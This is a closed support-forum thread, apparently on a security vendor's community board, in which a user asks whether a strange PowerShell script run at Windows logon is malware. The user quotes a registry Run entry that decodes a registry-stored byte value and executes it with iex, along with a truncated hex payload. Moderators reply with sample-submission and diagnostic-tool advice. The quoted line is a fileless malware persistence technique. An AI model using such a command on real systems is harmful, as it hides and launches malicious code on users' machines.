To stay updated on your favorite discussions, please create an account or log in. Then, click the Bookmark icon to subscribe and receive mail and platform notifications.

strange power shell script

tecnicogsn
tecnicogsn Alumni Posts: 1 Security Scout

Dear Support,

today i discovered a windows 7 workstation that during the user access was starting a strange powershell script.

Looking in Run key of the registry i seen this string: 

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cmstsitf"="rundll32 shell32.dll,ShellExec_RunDLL \"cmd\" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F').chsbWNet))"

 

Loking in the registry key 9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F i see this data.

(The byte data is mutch longher)

 

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\9D5F3F33-585C-D7B3-4A21-0CFB1EE5005F]
"Client32"=hex:2c,2f,f8,cc,96,b4,20,01,00,2f,f8,cc,46,4b,2f,01,f0,c7,f7,cc,46,\
5c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,\
2f,01,f0,e7,f7,cc,46,7c,2f,01,f0,e7,f7,cc,46,7c,d7,01,84,fa,13,f2,14,55,c8,\
ef,af,ae,1a,e3,5b,b0,14,32,e3,2f,e2,92,8e,2d,a6,83,0e,26,cf,fe,d6,d3,78,52,\[...]

 

Could be some king of malware?

Comments

  • JamesC
    JamesC WSAccount, WSEmployee, Moderator Posts: 474 Moderator

    Hi tecnicogsn

     

    If you suspect that:
    • A clean file has been falsely detected as malicious, or;
    • A file that is malicious but has not been detected by our software
    You can submit the file to our labs for further investigation. To submit a sample file, go to Submit a Sample or browse to the following link: https://www.f-secure.com/en/web/labs_global/submit-a-sample#sample-file
    1. Select the File Sample tab.
    2. Click Choose File, and attach your sample file.
      • Tick the box I want to give more details about this sample and to be notified of the analysis results if you want to receive feedback from F-Secure Labs on the submitted file.
      • Note: Subject and description should be written in English.
    3. Verify that you are not a robot with reCAPTCHA.
    4. Click Submit sample file.
    The sample submission is analyzed by our analysts and databases, and is updated if necessary.

    For more information how you can submit a sample, read our Community article here.
  • etomcat
    etomcat Alumni Posts: 1,172 Firewall Master

    Hello,

     

    I think you should use the built-in "F-Secure Support Tool" diagnostics on the computer, either through local run or activated remotely via centralized management and submit the resulting FSDIAG compressed file to F-Secure tech support. That often allows them to find out what's going on, even if an outright binary sample of the suspected malware cannot be located.

     

    Best Regards: Tamas Feher, Hungary.

This discussion has been closed.